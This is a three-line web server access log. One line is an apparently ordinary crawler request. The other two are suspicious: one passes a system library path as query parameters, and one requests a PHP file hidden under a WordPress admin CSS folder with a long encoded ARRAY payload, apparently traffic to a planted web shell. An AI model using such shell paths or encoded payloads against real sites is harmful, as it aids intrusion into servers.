34.225.243.131 - - [25/Oct/2025:12:24:11 +0000] "GET /screen-printing-vs-dtf-cricut-why-screen-printing-is-best/?fileloc=//lib64/gconv/ISO-IR-197.so&path=//lib64/gconv HTTP/1.1" 200 28251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
184.154.14.66 - - [25/Oct/2025:12:19:12 +0000] "GET /wp-admin/css/colors/ocean/ocean/index.php?ARRAY=7o2230223n313736313339383335322p2231223n22687474703n5p2s5p2s7n7336313276313361732r636p6s77652r6172745p2s3s6p633q7068705s636s64655s6n6326743q313736313339343735322q3534306666613363336334316264393133336133346535333363646463346230222p2232223n226366316335656161353133653330303731613361613538336136613135323331222p2233223n226437636665663266663734343266646435356338303962613839643638333963222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33392q35342q37302q37322q38312q3238227q HTTP/1.1" 504 16384 "-" "-"
66.249.79.129 - - [25/Oct/2025:12:24:12 +0000] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=2596865 HTTP/1.1" 200 24442 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
